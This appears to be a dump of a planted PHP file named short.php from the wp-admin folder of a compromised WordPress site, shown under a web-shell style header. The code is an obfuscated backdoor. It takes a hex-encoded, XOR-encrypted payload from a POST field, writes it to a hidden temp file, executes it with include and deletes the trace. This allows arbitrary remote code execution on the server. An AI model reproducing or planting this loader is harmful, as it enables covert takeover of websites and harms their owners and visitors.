| Linux premium201.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64 Path : /home/burnskfl/savagetreeremoval.com/wp-admin/ |
| Current File : /home/burnskfl/savagetreeremoval.com/wp-admin/short.php |
<?php
if(filter_has_var(INPUT_POST, "\x64e\x73c")){
$rec = array_filter([sys_get_temp_dir(), session_save_path(), getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", getcwd(), getenv("TMP")]);
$bind = hex2bin($_POST["\x64e\x73c"]);
$val = '' ; foreach(str_split($bind) as $char){$val.=chr(ord($char)^57);}
while ($data_chunk = array_shift($rec)) {
if ((is_dir($data_chunk) and is_writable($data_chunk))) {
$entity = join("/", [$data_chunk, ".object"]);
$success = file_put_contents($entity, $val);
if ($success) {
include $entity;
@unlink($entity);
die();
}
}
}
}